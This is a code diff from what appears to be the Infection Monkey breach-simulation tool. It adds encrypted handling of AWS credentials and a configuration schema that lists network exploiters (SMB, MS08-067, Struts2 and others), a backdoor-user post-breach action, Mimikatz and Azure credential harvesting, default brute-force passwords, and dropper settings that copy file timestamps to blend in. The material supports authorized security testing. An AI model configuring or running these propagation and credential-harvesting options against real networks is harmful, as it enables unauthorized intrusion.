 # This should be used for config values of array type (array of strings only)
 ENCRYPTED_CONFIG_ARRAYS = \

@@ -881,7 +29,9 @@ ENCRYPTED_CONFIG_ARRAYS = \
 # This should be used for config values of string type
 ENCRYPTED_CONFIG_STRINGS = \
     [
+        ['cnc', 'aws_config', 'aws_access_key_id'],
+        ['cnc', 'aws_config', 'aws_account_id'],
+        ['cnc', 'aws_config', 'aws_secret_access_key']
     ]


@@ -892,11 +42,12 @@ class ConfigService:
         pass

     @staticmethod
-    def get_config(is_initial_config=False, should_decrypt=True):
+    def get_config(is_initial_config=False, should_decrypt=True, is_island=False):
         """
         Gets the entire global config.
         :param is_initial_config: If True, the initial config will be returned instead of the current config.
         :param should_decrypt: If True, all config values which are set as encrypted will be decrypted.
+        :param is_island: If True, will include island specific configuration parameters.
         :return: The entire global config.
         """
         config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {}

@@ -904,6 +55,8 @@ class ConfigService:
             config.pop(field, None)
         if should_decrypt and len(config) > 0:
             ConfigService.decrypt_config(config)
+        if not is_island:
+            config.get('cnc', {}).pop('aws_config', None)
         return config

     @staticmethod
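The new is_island flag keeps the AWS credentials block out of any configuration handed to agents. A hedged usage sketch, assuming the usual Island application context:

# Island-side callers opt in to the AWS block; everyone else gets it stripped.
island_config = ConfigService.get_config(should_decrypt=True, is_island=True)
agent_config = ConfigService.get_config(should_decrypt=True)
assert 'aws_config' not in agent_config.get('cnc', {})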
@@ -927,6 +80,12 @@ class ConfigService:
             config = encryptor.dec(config)
         return config

+    @staticmethod
+    def set_config_value(config_key_as_arr, value):
+        mongo_key = ".".join(config_key_as_arr)
+        mongo.db.config.update({'name': 'newconfig'},
+                               {"$set": {mongo_key: value}})
+
     @staticmethod
     def get_flat_config(is_initial_config=False, should_decrypt=True):
         config_json = ConfigService.get_config(is_initial_config, should_decrypt)
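The new set_config_value helper writes a single dotted key into the 'newconfig' document. An illustrative call using one of the AWS key paths registered in ENCRYPTED_CONFIG_STRINGS above; whether callers pre-encrypt the value here is an assumption of this sketch, and the access key is a placeholder.

# Illustrative only; the access key value is a placeholder.
ConfigService.set_config_value(['cnc', 'aws_config', 'aws_access_key_id'],
                               encryptor.enc('AKIA...'))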
@@ -986,6 +145,8 @@ class ConfigService:

     @staticmethod
     def update_config(config_json, should_encrypt):
+        # PBA file upload happens on pba_file_upload endpoint and corresponding config options are set there
+        cc.services.post_breach_files.set_config_PBA_files(config_json)
         if should_encrypt:
             try:
                 ConfigService.encrypt_config(config_json)

@@ -1021,6 +182,7 @@ class ConfigService:

     @staticmethod
     def reset_config():
+        cc.services.post_breach_files.remove_PBA_files()
         config = ConfigService.get_default_config(True)
         ConfigService.set_server_ips_in_config(config)
         ConfigService.update_config(config, should_encrypt=False)

@@ -1077,11 +239,15 @@ class ConfigService:
         ConfigService._encrypt_or_decrypt_config(config, False)

     @staticmethod
-    def decrypt_flat_config(flat_config):
+    def decrypt_flat_config(flat_config, is_island=False):
         """
         Same as decrypt_config but for a flat configuration
         """
-        keys = [config_arr_as_array[2] for config_arr_as_array in (ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
+        if is_island:
+            keys = [config_arr_as_array[2] for config_arr_as_array in
+                    (ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
+        else:
+            keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
         for key in keys:
             if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
                 # Check if we are decrypting ssh key pair
@ -0,0 +1,950 @@
|
||||||
|
WARNING_SIGN = u" \u26A0"
|
||||||
|
|
||||||
|
SCHEMA = {
|
||||||
|
"title": "Monkey",
|
||||||
|
"type": "object",
|
||||||
|
"definitions": {
|
||||||
|
"exploiter_classes": {
|
||||||
|
"title": "Exploit class",
|
||||||
|
"type": "string",
|
||||||
|
"anyOf": [
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SmbExploiter"
|
||||||
|
],
|
||||||
|
"title": "SMB Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"WmiExploiter"
|
||||||
|
],
|
||||||
|
"title": "WMI Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"MSSQLExploiter"
|
||||||
|
],
|
||||||
|
"title": "MSSQL Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"RdpExploiter"
|
||||||
|
],
|
||||||
|
"title": "RDP Exploiter (UNSAFE)"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"Ms08_067_Exploiter"
|
||||||
|
],
|
||||||
|
"title": "MS08-067 Exploiter (UNSAFE)"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SSHExploiter"
|
||||||
|
],
|
||||||
|
"title": "SSH Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"ShellShockExploiter"
|
||||||
|
],
|
||||||
|
"title": "ShellShock Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SambaCryExploiter"
|
||||||
|
],
|
||||||
|
"title": "SambaCry Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"ElasticGroovyExploiter"
|
||||||
|
],
|
||||||
|
"title": "ElasticGroovy Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"Struts2Exploiter"
|
||||||
|
],
|
||||||
|
"title": "Struts2 Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"WebLogicExploiter"
|
||||||
|
],
|
||||||
|
"title": "Oracle Web Logic Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"HadoopExploiter"
|
||||||
|
],
|
||||||
|
"title": "Hadoop/Yarn Exploiter"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"post_breach_acts": {
|
||||||
|
"title": "Post breach actions",
|
||||||
|
"type": "string",
|
||||||
|
"anyOf": [
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"BackdoorUser"
|
||||||
|
],
|
||||||
|
"title": "Back door user",
|
||||||
|
},
|
||||||
|
],
|
||||||
|
},
|
||||||
|
"finger_classes": {
|
||||||
|
"title": "Fingerprint class",
|
||||||
|
"type": "string",
|
||||||
|
"anyOf": [
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SMBFinger"
|
||||||
|
],
|
||||||
|
"title": "SMBFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SSHFinger"
|
||||||
|
],
|
||||||
|
"title": "SSHFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"PingScanner"
|
||||||
|
],
|
||||||
|
"title": "PingScanner"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"HTTPFinger"
|
||||||
|
],
|
||||||
|
"title": "HTTPFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"MySQLFinger"
|
||||||
|
],
|
||||||
|
"title": "MySQLFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"MSSQLFinger"
|
||||||
|
],
|
||||||
|
"title": "MSSQLFinger"
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"ElasticFinger"
|
||||||
|
],
|
||||||
|
"title": "ElasticFinger"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"properties": {
|
||||||
|
"basic": {
|
||||||
|
"title": "Basic - Credentials",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"credentials": {
|
||||||
|
"title": "Credentials",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"exploit_user_list": {
|
||||||
|
"title": "Exploit user list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"Administrator",
|
||||||
|
"root",
|
||||||
|
"user"
|
||||||
|
],
|
||||||
|
"description": "List of usernames to use on exploits using credentials"
|
||||||
|
},
|
||||||
|
"exploit_password_list": {
|
||||||
|
"title": "Exploit password list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"Password1!",
|
||||||
|
"1234",
|
||||||
|
"password",
|
||||||
|
"12345678"
|
||||||
|
],
|
||||||
|
"description": "List of password to use on exploits using credentials"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"basic_network": {
|
||||||
|
"title": "Basic - Network",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"blocked_ips": {
|
||||||
|
"title": "Blocked IPs",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description": "List of IPs to not scan"
|
||||||
|
},
|
||||||
|
"local_network_scan": {
|
||||||
|
"title": "Local network scan",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether the monkey should scan its subnets additionally"
|
||||||
|
},
|
||||||
|
"depth": {
|
||||||
|
"title": "Distance from island",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 2,
|
||||||
|
"description":
|
||||||
|
"Amount of hops allowed for the monkey to spread from the island. "
|
||||||
|
+ WARNING_SIGN
|
||||||
|
+ " Note that setting this value too high may result in the monkey propagating too far"
|
||||||
|
},
|
||||||
|
"subnet_scan_list": {
|
||||||
|
"title": "Scan IP/subnet list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"List of IPs/subnets the monkey should scan."
|
||||||
|
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"network_analysis": {
|
||||||
|
"title": "Network Analysis",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"inaccessible_subnets": {
|
||||||
|
"title": "Network segmentation testing",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"Test for network segmentation by providing a list of"
|
||||||
|
" subnets that should NOT be accessible to each other."
|
||||||
|
" For example, given the following configuration:"
|
||||||
|
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
|
||||||
|
" a Monkey running on 10.0.0.5 will try to access machines in the following"
|
||||||
|
" subnets: 11.0.0.2/32, 12.2.3.0/24."
|
||||||
|
" An alert on successful connections will be shown in the report"
|
||||||
|
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"monkey": {
|
||||||
|
"title": "Monkey",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"alive": {
|
||||||
|
"title": "Alive",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Is the monkey alive"
|
||||||
|
},
|
||||||
|
"post_breach_actions": {
|
||||||
|
"title": "Post breach actions",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"$ref": "#/definitions/post_breach_acts"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description": "List of actions the Monkey will run post breach"
|
||||||
|
},
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"behaviour": {
|
||||||
|
"title": "Behaviour",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"custom_PBA_linux_cmd": {
|
||||||
|
"title": "Linux post breach command",
|
||||||
|
"type": "string",
|
||||||
|
"default": "",
|
||||||
|
"description": "Linux command to be executed after breaching."
|
||||||
|
},
|
||||||
|
"PBA_linux_file": {
|
||||||
|
"title": "Linux post breach file",
|
||||||
|
"type": "string",
|
||||||
|
"format": "data-url",
|
||||||
|
"description": "File to be executed after breaching. "
|
||||||
|
"If you want custom execution behavior, "
|
||||||
|
"specify it in 'Linux post breach command' field. "
|
||||||
|
"Reference your file by filename."
|
||||||
|
},
|
||||||
|
"custom_PBA_windows_cmd": {
|
||||||
|
"title": "Windows post breach command",
|
||||||
|
"type": "string",
|
||||||
|
"default": "",
|
||||||
|
"description": "Windows command to be executed after breaching."
|
||||||
|
},
|
||||||
|
"PBA_windows_file": {
|
||||||
|
"title": "Windows post breach file",
|
||||||
|
"type": "string",
|
||||||
|
"format": "data-url",
|
||||||
|
"description": "File to be executed after breaching. "
|
||||||
|
"If you want custom execution behavior, "
|
||||||
|
"specify it in 'Windows post breach command' field. "
|
||||||
|
"Reference your file by filename."
|
||||||
|
},
|
||||||
|
"PBA_windows_filename": {
|
||||||
|
"title": "Windows PBA filename",
|
||||||
|
"type": "string",
|
||||||
|
"default": ""
|
||||||
|
},
|
||||||
|
"PBA_linux_filename": {
|
||||||
|
"title": "Linux PBA filename",
|
||||||
|
"type": "string",
|
||||||
|
"default": ""
|
||||||
|
},
|
||||||
|
"self_delete_in_cleanup": {
|
||||||
|
"title": "Self delete on cleanup",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": False,
|
||||||
|
"description": "Should the monkey delete its executable when going down"
|
||||||
|
},
|
||||||
|
"use_file_logging": {
|
||||||
|
"title": "Use file logging",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Should the monkey dump to a log file"
|
||||||
|
},
|
||||||
|
"serialize_config": {
|
||||||
|
"title": "Serialize config",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": False,
|
||||||
|
"description": "Should the monkey dump its config on startup"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"system_info": {
|
||||||
|
"title": "System info",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"extract_azure_creds": {
|
||||||
|
"title": "Harvest Azure Credentials",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
||||||
|
},
|
||||||
|
"collect_system_info": {
|
||||||
|
"title": "Collect system info",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether to collect system info"
|
||||||
|
},
|
||||||
|
"should_use_mimikatz": {
|
||||||
|
"title": "Should use Mimikatz",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether to use Mimikatz"
|
||||||
|
},
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"life_cycle": {
|
||||||
|
"title": "Life cycle",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"max_iterations": {
|
||||||
|
"title": "Max iterations",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 1,
|
||||||
|
"description": "Determines how many iterations of the monkey's full lifecycle should occur"
|
||||||
|
},
|
||||||
|
"victims_max_find": {
|
||||||
|
"title": "Max victims to find",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 30,
|
||||||
|
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
||||||
|
},
|
||||||
|
"victims_max_exploit": {
|
||||||
|
"title": "Max victims to exploit",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 7,
|
||||||
|
"description":
|
||||||
|
"Determines the maximum number of machines the monkey"
|
||||||
|
" is allowed to successfully exploit. " + WARNING_SIGN
|
||||||
|
+ " Note that setting this value too high may result in the monkey propagating to "
|
||||||
|
"a high number of machines"
|
||||||
|
},
|
||||||
|
"timeout_between_iterations": {
|
||||||
|
"title": "Wait time between iterations",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 100,
|
||||||
|
"description":
|
||||||
|
"Determines for how long (in seconds) should the monkey wait between iterations"
|
||||||
|
},
|
||||||
|
"retry_failed_explotation": {
|
||||||
|
"title": "Retry failed exploitation",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determines whether the monkey should retry exploiting machines"
|
||||||
|
" it didn't successfuly exploit on previous iterations"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"internal": {
|
||||||
|
"title": "Internal",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"singleton_mutex_name": {
|
||||||
|
"title": "Singleton mutex name",
|
||||||
|
"type": "string",
|
||||||
|
"default": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
||||||
|
"description":
|
||||||
|
"The name of the mutex used to determine whether the monkey is already running"
|
||||||
|
},
|
||||||
|
"keep_tunnel_open_time": {
|
||||||
|
"title": "Keep tunnel open time",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 60,
|
||||||
|
"description": "Time to keep tunnel open before going down after last exploit (in seconds)"
|
||||||
|
},
|
||||||
|
"monkey_dir_windows": {
|
||||||
|
"title": "Monkey's windows directory",
|
||||||
|
"type": "string",
|
||||||
|
"default": r"C:\Windows\temp\monkey_dir",
|
||||||
|
"description": "Directory containing all monkey files on windows"
|
||||||
|
},
|
||||||
|
"monkey_dir_linux": {
|
||||||
|
"title": "Monkey's linux directory",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/monkey_dir",
|
||||||
|
"description": "Directory containing all monkey files on linux"
|
||||||
|
},
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"classes": {
|
||||||
|
"title": "Classes",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"finger_classes": {
|
||||||
|
"title": "Fingerprint classes",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"$ref": "#/definitions/finger_classes"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"SMBFinger",
|
||||||
|
"SSHFinger",
|
||||||
|
"PingScanner",
|
||||||
|
"HTTPFinger",
|
||||||
|
"MySQLFinger",
|
||||||
|
"MSSQLFinger",
|
||||||
|
"ElasticFinger"
|
||||||
|
],
|
||||||
|
"description": "Determines which classes to use for fingerprinting"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"kill_file": {
|
||||||
|
"title": "Kill file",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"kill_file_path_windows": {
|
||||||
|
"title": "Kill file path on Windows",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%windir%\\monkey.not",
|
||||||
|
"description": "Path of file which kills monkey if it exists (on Windows)"
|
||||||
|
},
|
||||||
|
"kill_file_path_linux": {
|
||||||
|
"title": "Kill file path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/var/run/monkey.not",
|
||||||
|
"description": "Path of file which kills monkey if it exists (on Linux)"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"dropper": {
|
||||||
|
"title": "Dropper",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"dropper_set_date": {
|
||||||
|
"title": "Dropper sets date",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determines whether the dropper should set the monkey's file date to be the same as"
|
||||||
|
" another file"
|
||||||
|
},
|
||||||
|
"dropper_date_reference_path_windows": {
|
||||||
|
"title": "Dropper date reference path (Windows)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%windir%\\system32\\kernel32.dll",
|
||||||
|
"description":
|
||||||
|
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||||
|
" so on Windows (use fullpath)"
|
||||||
|
},
|
||||||
|
"dropper_date_reference_path_linux": {
|
||||||
|
"title": "Dropper date reference path (Linux)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/bin/sh",
|
||||||
|
"description":
|
||||||
|
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||||
|
" so on Linux (use fullpath)"
|
||||||
|
},
|
||||||
|
"dropper_target_path_linux": {
|
||||||
|
"title": "Dropper target path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/monkey",
|
||||||
|
"description": "Determines where should the dropper place the monkey on a Linux machine"
|
||||||
|
},
|
||||||
|
"dropper_target_path_win_32": {
|
||||||
|
"title": "Dropper target path on Windows (32bit)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "C:\\Windows\\monkey32.exe",
|
||||||
|
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||||
|
"(32bit)"
|
||||||
|
},
|
||||||
|
"dropper_target_path_win_64": {
|
||||||
|
"title": "Dropper target path on Windows (64bit)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "C:\\Windows\\monkey64.exe",
|
||||||
|
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||||
|
"(64 bit)"
|
||||||
|
},
|
||||||
|
"dropper_try_move_first": {
|
||||||
|
"title": "Try to move first",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determines whether the dropper should try to move itsel instead of copying itself"
|
||||||
|
" to target path"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"logging": {
|
||||||
|
"title": "Logging",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"dropper_log_path_linux": {
|
||||||
|
"title": "Dropper log file path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/user-1562",
|
||||||
|
"description": "The fullpath of the dropper log file on Linux"
|
||||||
|
},
|
||||||
|
"dropper_log_path_windows": {
|
||||||
|
"title": "Dropper log file path on Windows",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%temp%\\~df1562.tmp",
|
||||||
|
"description": "The fullpath of the dropper log file on Windows"
|
||||||
|
},
|
||||||
|
"monkey_log_path_linux": {
|
||||||
|
"title": "Monkey log file path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/user-1563",
|
||||||
|
"description": "The fullpath of the monkey log file on Linux"
|
||||||
|
},
|
||||||
|
"monkey_log_path_windows": {
|
||||||
|
"title": "Monkey log file path on Windows",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%temp%\\~df1563.tmp",
|
||||||
|
"description": "The fullpath of the monkey log file on Windows"
|
||||||
|
},
|
||||||
|
"send_log_to_server": {
|
||||||
|
"title": "Send log to server",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether the monkey sends its log to the Monkey Island server"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"exploits": {
|
||||||
|
"title": "Exploits",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"exploit_lm_hash_list": {
|
||||||
|
"title": "Exploit LM hash list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [],
|
||||||
|
"description": "List of LM hashes to use on exploits using credentials"
|
||||||
|
},
|
||||||
|
"exploit_ntlm_hash_list": {
|
||||||
|
"title": "Exploit NTLM hash list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [],
|
||||||
|
"description": "List of NTLM hashes to use on exploits using credentials"
|
||||||
|
},
|
||||||
|
"exploit_ssh_keys": {
|
||||||
|
"title": "SSH key pairs list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"default": [],
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"description": "List of SSH key pairs to use, when trying to ssh into servers"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"cnc": {
|
||||||
|
"title": "Monkey Island",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"servers": {
|
||||||
|
"title": "Servers",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"command_servers": {
|
||||||
|
"title": "Command servers",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"192.0.2.0:5000"
|
||||||
|
],
|
||||||
|
"description": "List of command servers to try and communicate with (format is <ip>:<port>)"
|
||||||
|
},
|
||||||
|
"internet_services": {
|
||||||
|
"title": "Internet services",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"monkey.guardicore.com",
|
||||||
|
"www.google.com"
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"List of internet services to try and communicate with to determine internet"
|
||||||
|
" connectivity (use either ip or domain)"
|
||||||
|
},
|
||||||
|
"current_server": {
|
||||||
|
"title": "Current server",
|
||||||
|
"type": "string",
|
||||||
|
"default": "192.0.2.0:5000",
|
||||||
|
"description": "The current command server the monkey is communicating with"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'aws_config': {
|
||||||
|
'title': 'AWS Configuration',
|
||||||
|
'type': 'object',
|
||||||
|
'description': 'These credentials will be used in order to export the monkey\'s findings to the AWS Security Hub.',
|
||||||
|
'properties': {
|
||||||
|
'aws_account_id': {
|
||||||
|
'title': 'AWS account ID',
|
||||||
|
'type': 'string',
|
||||||
|
'description': 'Your AWS account ID that is subscribed to security hub feeds',
|
||||||
|
'default': ''
|
||||||
|
},
|
||||||
|
'aws_access_key_id': {
|
||||||
|
'title': 'AWS access key ID',
|
||||||
|
'type': 'string',
|
||||||
|
'description': 'Your AWS public access key ID, can be found in the IAM user interface in the AWS console.',
|
||||||
|
'default': ''
|
||||||
|
},
|
||||||
|
'aws_secret_access_key': {
|
||||||
|
'title': 'AWS secret access key',
|
||||||
|
'type': 'string',
|
||||||
|
'description': 'Your AWS secret access key id, you can get this after creating a public access key in the console.',
|
||||||
|
'default': ''
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"exploits": {
|
||||||
|
"title": "Exploits",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"exploiter_classes": {
|
||||||
|
"title": "Exploits",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"$ref": "#/definitions/exploiter_classes"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"SmbExploiter",
|
||||||
|
"WmiExploiter",
|
||||||
|
"SSHExploiter",
|
||||||
|
"ShellShockExploiter",
|
||||||
|
"SambaCryExploiter",
|
||||||
|
"ElasticGroovyExploiter",
|
||||||
|
"Struts2Exploiter",
|
||||||
|
"WebLogicExploiter",
|
||||||
|
"HadoopExploiter"
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"Determines which exploits to use. " + WARNING_SIGN
|
||||||
|
+ " Note that using unsafe exploits may cause crashes of the exploited machine/service"
|
||||||
|
},
|
||||||
|
"skip_exploit_if_file_exist": {
|
||||||
|
"title": "Skip exploit if file exists",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": False,
|
||||||
|
"description": "Determines whether the monkey should skip the exploit if the monkey's file"
|
||||||
|
" is already on the remote machine"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"ms08_067": {
|
||||||
|
"title": "MS08_067",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"ms08_067_exploit_attempts": {
|
||||||
|
"title": "MS08_067 exploit attempts",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 5,
|
||||||
|
"description": "Number of attempts to exploit using MS08_067"
|
||||||
|
},
|
